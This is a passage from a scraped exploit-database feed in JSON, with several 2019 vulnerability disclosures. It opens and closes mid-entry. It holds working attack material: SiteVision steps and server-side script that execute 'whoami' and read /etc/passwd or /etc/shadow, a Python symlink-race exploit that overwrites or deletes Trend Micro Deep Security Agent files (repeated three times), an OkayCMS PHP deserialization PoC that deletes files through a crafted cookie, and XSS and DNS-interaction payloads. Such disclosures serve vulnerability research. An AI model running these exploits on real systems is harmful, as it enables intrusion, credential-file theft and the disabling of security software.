The following is the resulting request for our demo environment: \n \n``` \nPOST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1 \nHost: fast.furious \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en \nAccept-Encoding: gzip, deflate \nReferer: http://fast.furious/edit/4.549514a216b1c6180f41c3 \nContent-Type: application/json; charset=utf-8 \nX-CSRF-Token: [...] \nX-Requested-With: XMLHttpRequest \nContent-Length: 70 \nConnection: close \nCookie: [...] \n \n{\"portletType\":\"script\",\"relativeElement\":\"12.549514a216b1c6180f41d0\"} \n``` \n \n7. Issue the modified request to the application. \n8. Reload the current page and note how it now contains a script module. \n9. Edit the script module to contain the following JavaScript code: \n \n``` \nconst app = (() => { \n'use strict'; \n \nimportPackage(java.io); \nimportPackage(java.lang); \n \nconst init = () => { \nvar result = []; \n \nvar p = Runtime.getRuntime().exec(\"whoami\"); \nvar stdInput = new BufferedReader( new InputStreamReader( p.getInputStream() ) ); \nvar s; \nwhile (( s = stdInput.readLine()) != null) { \nresult.push(s); \n} \n \nreturn result; \n \n}; \n \nreturn { init: init }; \n})(); \n \nconst context = app.init(); \n``` \n \n9b. Following PoC can be used for reading files such as /etc/passwd or /etc/shadow: \n \n``` \nconst app = (() => { \n'use strict'; \n \nimportPackage(java.io); \nimportPackage(java.lang); \n \nconst init = () => { \nvar result = []; \nvar file = new File('/etc/passwd'); \nvar br = new BufferedReader(new FileReader(file)); \n \nvar st; \nwhile ((st = br.readLine()) != null) { \nresult.push(st); \n} \n \nreturn result; \n}; \n \nreturn { init: init }; \n})(); \n \nconst context = app.init(); \n``` \n \n10. 
Enter the following Velocity code: \n \n``` \n<hr> \n<h2> \nScript output: \n</h2> \n \n<h3> \nAs List: \n</h3> \n<ul> \n#foreach( $c in $context ) \n<li>$c</li> \n#end \n</ul> \n \n<h3> \nAs String: \n</h3> \n<pre>$context</pre> \n<hr> \n``` \n \n11. Under \"Other\" check \"Show in edit mode\". \n12. Press \"OK\". \n13. Note the script output, and how it contains the result of the system command. In the command example above, the result of whoami should be \"root\" if SiteVision 5 was installed using the vendor-provided RPM package. \n \n \n## Vulnerability Disclosure Timeline \n2019-06-03 - Disclosed to vendor \n2019-06-04 - Vendor confirms vulnerability \n2019-09-26 - Vendor issues patches \n2019-12-04 - Public disclosure \n \nOscar Hjelm \nCybercom Sweden \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155585/sitevision-exec.txt"}, {"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155579", "href": "https://packetstormsecurity.com/files/155579/Trend-Micro-Deep-Security-Agent-11-Arbitrary-File-Overwrite.html", "title": "Trend Micro Deep Security Agent 11 Arbitrary File Overwrite", "type": "packetstorm", "sourceData": "`# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite \n# Exploit Author : Peter Lapp \n# Exploit Date: 2019-12-05 \n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html \n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716 \n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise. 
\n# CVE: 2019-15627 \n \n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec) \n \n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools ) \n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with arbitrary data hosted elsewhere (with limitations) \n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \n \n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately. \n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file. \n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \n# are ripe for the writing that can then point to a malicious binary. \n \n# Usage: \n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \n# 2. Open a browser (preferably IE) and start the script \n# 3. 
Browse to your malicious page (if just deleting the target file, browse to any page with javascript). \n# 4. Keep refreshing the page until you see the script create the target file overwritten. \n# \n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \n \n \nimport time \nimport os \nimport subprocess \nimport sys \nimport webbrowser \nfrom watchdog.observers import Observer \nfrom watchdog.events import FileSystemEventHandler \n \nclass Stage1_Handler(FileSystemEventHandler): \ndef __init__(self): \nself.filenames = [] \ndef on_created(self, event): \nfilename = os.path.basename(event.src_path) \nif filename in self.filenames: \nprint ('Starting symlink creation.') \nwatcher1.stop() \nsymlinkery(self.filenames) \nelse: \nself.filenames.append(filename) \nprint ('File %s created.') % filename \n \nclass Stage2_Handler(FileSystemEventHandler): \ndef on_any_event(self, event): \nif os.path.basename(event.src_path) == 'dsa_control.cmd': \nprint \"Target file overwritten/deleted. 
Cleaning up.\" \nsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True) \nsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True) \nos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"') \nos.system('rmdir /S /Q \"C:\\\\test\"') \nos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp') \nwatcher2.stop() \nsys.exit(0) \n \nclass Watcher(object): \ndef __init__(self, event_handler, path_to_watch): \nself.event_handler = event_handler \nself.path_to_watch = path_to_watch \nself.observer = Observer() \ndef run(self): \nself.observer.schedule(self.event_handler(), self.path_to_watch) \nself.observer.start() \ntry: \nwhile True: \ntime.sleep(1) \nexcept KeyboardInterrupt: \nself.observer.stop() \n \nself.observer.join() \ndef stop(self): \nself.observer.stop() \n \ndef symlinkery(filenames): \nprint \"Enter symlinkery\" \nfor filename in filenames: \nprint \"Creating symlink for %s\" % filename \ncmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename \nsubprocess.Popen(cmdname, shell=True) \nos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig') \nos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test') \nwatcher2.run() \nprint \"Watcher 2 started\" \n \ntry: \nos.mkdir('C:\\\\test') \nexcept: \npass \n \npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus' \npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\' \nwatcher1 = Watcher(Stage1_Handler,path1) \nwatcher2 = Watcher(Stage2_Handler,path2) \nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\" \nsubprocess.Popen(switcheroo, shell=True) 
\nwatcher1.run() \n`\n", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155579/trendmicrodsa11-fileoverwrite.txt"}, {"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155584", "href": "https://packetstormsecurity.com/files/155584/SiteVision-4.x-5.x-Insufficient-Module-Access-Control.html", "title": "SiteVision 4.x / 5.x Insufficient Module Access Control", "type": "packetstorm", "sourceData": "`# SiteVision Insufficient Module Access Control \n \nCVE-2019-12734 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12734 \nhttps://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/ \n \n \n## Summary \nAttackers may inject non-authorised modules when editing pages using a low-privilege account, leading to impacts ranging from Cross-Site Scripting to Remote Code Execution. \n \n \n## Vendor Description \nSiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision. \n \n \n## Affected Versions \nAll versions of SiteVision 4 until 4.5.6. \nAll versions of SiteVision 5 until 5.1.1. \nEarlier major versions are assumed to be vulnerable. \n \n \n## Technical Details \nThis vulnerability allows remote code execution as described in CVE-2019-12733. \n \nModules are basic building blocks in SiteVision pages and templates; they can feature display content such as headings and paragraphs, social functions and commenting, raw HTML, or server-side scripts. \n \nThe SiteVision application does not sufficiently assert whether or not the current user is authorised to add a specific module type to the current page, allowing attackers with low-privilege to add hostile content. 
This can trivially be reproduced by adding a paragraph text module, and changing \"text\" to \"html\" (or any other type) in the outgoing HTTP request. The application does not check whether or not the user is authorised to add the requested module; it relies on the fact that the user interface does not expose a button for it. \n \nReproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5: \n \n1. Install SiteVision and either create or import a new site. \n2. Set up and create an Editor (\"Redakt\u00f6r\") user. \n3. Log on as the new low-privilege user. \n4. Create a new page and note how only basic modules are available. \n5. Insert a text module. \n6. Re-send the HTTP request generated in step #5, but change the value of portletType from \"text\" to \"html\". The following is the resulting request for our demo environment: \n \n``` \nPOST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1 \nHost: fast.furious \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en \nAccept-Encoding: gzip, deflate \nReferer: http://fast.furious/edit/4.549514a216b1c6180f41c3 \nContent-Type: application/json; charset=utf-8 \nX-CSRF-Token: [...] \nX-Requested-With: XMLHttpRequest \nContent-Length: 70 \nConnection: close \nCookie: [...] \n \n{\"portletType\":\"html\",\"relativeElement\":\"12.549514a216b1c6180f41d0\"} \n``` \n \n7. Edit the HTML module and inject any JavaScript payload such as `<script>alert(1)</script>`. \n8. Under \"Other\" check \"Show in edit mode\". \n9. Press \"OK\". \n10. Note the alert pop-up, indicating that the injected JavaScript was executed. 
\n \n \n## Vulnerability Disclosure Timeline \n2019-06-03 - Disclosed to vendor \n2019-06-04 - Vendor confirms vulnerability \n2019-09-26 - Vendor issues patches \n2019-12-04 - Public disclosure \n \nOscar Hjelm \nCybercom Sweden \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155584/sitevision-accesscontrol.txt"}, {"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155580", "href": "https://packetstormsecurity.com/files/155580/Microsoft-Skype-For-Business-DNS-Query.html", "title": "Microsoft Skype For Business DNS Query", "type": "packetstorm", "sourceData": "`I. VULNERABILITY \n------------------------- \nMicrosoft Skype for Business External Service Interaction (DNS) \nLatest Version \n \nII. CVE REFERENCE \n------------------------- \nNot Assigned Yet \n \nIII. VENDOR \n------------------------- \nhttps://www.microsoft.com \n \nIV. TIMELINE \n------------------------- \n28/11/2019 Vulnerability discovered \n03/12/2019 Vendor contacted \n04/12/2019 Microsoft replied that \u201cWe determined that this behavior is \nconsidered to be by design.\u201d \n \nV. CREDIT \n------------------------- \nAlphan Yavas from Biznet Bilisim A.S. \n \nVI. DESCRIPTION \n------------------------- \nThe latest versions of Microsoft Skype for Business are affected by an \nexternal service interaction (DNS) vulnerability. A remote attacker can force \nthe vulnerable server to send a DNS request to any remote server the \nattacker chooses. \n \nVII. PROOF OF CONCEPT \n------------------------- \nAffected Component: \nPath(inurl): /Dialin/Conference.aspx \nParameter: Username \n \nThe login page of Skype for Business is affected by an external service \ninteraction (DNS) vulnerability. If the username is sent in the \nfollowing format, the victim server will send out DNS queries to the xxx \ndomain. 
(xxx is the domain to which you want the server to send the \nrequest) \n \nusername: ssrf.xxx.com\\pentest \npassword: (doesn't matter) \n \nReference: https://portswigger.net/kb/issues/00300200_external-service-interaction-dns \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155580/msskype-forgeddns.txt"}, {"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155583", "href": "https://packetstormsecurity.com/files/155583/OkayCMS-2.3.4-Remote-Code-Execution.html", "title": "OkayCMS 2.3.4 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Unauthenticated remote code execution in OkayCMS \n \n## Overview \n* Identifier: AIT-SA-20191129-01 \n* Target: OkayCMS \n* Vendor: OkayCMS \n* Version: all versions including 2.3.4 \n* CVE: CVE-2019-16885 \n* Accessibility: Local \n* Severity: Critical \n* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) \n \n## Summary \n[OkayCMS is a simple and functional content management system for an online store.](https://okay-cms.com) \n \n## Vulnerability Description \nAn unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This can happen in two places: in \"view/ProductsView.php\" using the cookie \"price_filter\", or in \"api/Comparison.php\" via the cookie \"comparison\". Both cookies pass untrusted values to an unserialize() call. The following code shows the vulnerability in \"api/Comparison.php\": \n \n``` \n$items = !empty($_COOKIE['comparison']) ? 
unserialize($_COOKIE['comparison']) : array(); \n``` \n \nThe unsafe deserialization also occurs in \"view/ProductsView.php\": \n \n``` \n$price_filter = unserialize($_COOKIE['price_filter']); \n``` \n \n \n## Proof of Concept \nThe following code utilizes an object of the smarty-component to delete arbitrary files from the webhost: \n \n``` \n<?php \n \nif($argc != 3) \n{ \nprint \"usage: $argv[0] <url> <file>\\n\"; \nexit(1); \n} \n \n$url = $argv[1]; \n$file = $argv[2]; \n \nclass Smarty_Internal_CacheResource_File { \n \npublic function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) { \n$cached->is_locked = false; \n@unlink($cached->lock_id); \n} \n} \n \nclass Smarty_Template_Cached { \npublic $handler = null; \npublic $is_locked = true; \npublic $lock_id = \"\"; \n \npublic function __construct() { \n$this->lock_id = $GLOBALS['file']; \n$this->handler = new Smarty_Internal_CacheResource_File; \n} \n} \n \n \nclass Smarty { \npublic $cache_locking = true; \n} \n \nclass Smarty_Internal_Template { \npublic $smarty = null; \npublic $cached = null; \n \npublic function __construct() { \n$this->smarty = new Smarty; \n$this->cached = new Smarty_Template_Cached; \n} \n \npublic function __destruct(){ \nif ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) { \n$this->cached->handler->releaseLock($this->smarty, $this->cached); \n} \n} \n} \n \n$obj = new Smarty_Internal_Template(); \n \n$serialized = serialize($obj); \n \n$un = unserialize($serialized); \n \n$headers = [ \n'Accept-Language: en-US,en;q=0.5', \n\"Referer: $url/en/catalog/myagkie-igrushki\", \n'Cookie: ' . 'price_filter=' . urlencode($serialized) . 
';' \n]; \n \n$curl = curl_init(); \ncurl_setopt_array($curl, [ \nCURLOPT_HTTPHEADER => $headers, \nCURLOPT_RETURNTRANSFER => true, \nCURLOPT_URL => \"$url/en/catalog/myagkie-igrushki/sort-price\", \nCURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' \n]); \n$resp = curl_exec($curl); \nif(curl_error($curl)) { \nprint curl_error($curl); \n} \ncurl_close($curl); \n \n \nprint $resp; \n \n?> \n``` \n\n## Notes \nBecause of the high severity of this vulnerability we will not release a full exploit for the remote code execution. \n \n## Vulnerable Versions \nAll versions of the \u201cLite\u201d branch up to and including 2.3.4. Pro versions prior to 3.0.2 might have been affected too. \n \n## Tested Versions \nOkayCMS-Lite 2.3.4 \n \n## Impact \nAn unauthenticated attacker could upload a webshell to the server and execute commands remotely. \n \n## Mitigation \nAt the time of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended. 
\n \n## References: \n* https://nvd.nist.gov/vuln/detail/CVE-2019-16885 \n \n## Vendor Contact Timeline \n \n* `2019-08-29` Contacting the vendor \n* `2019-09-04` Vendor replied \n* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix \n* `2019-09-29` Public disclosure \n \n## Advisory URL \n[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms) \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155583/AIT-SA-20191129-01.txt"}], "zdt": [{"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data 
hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. 
\r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" 
% filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}], "exploitdb": [{"lastseen": "2019-12-06T08:26:49", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "EDB-ID:47751", "href": "https://www.exploit-db.com/exploits/47751", "type": "exploitdb", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Exploit Date: 2019-12-05\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security 
Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with arbitrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferably IE) and start the script\r\n# 3. 
Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. 
Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe 
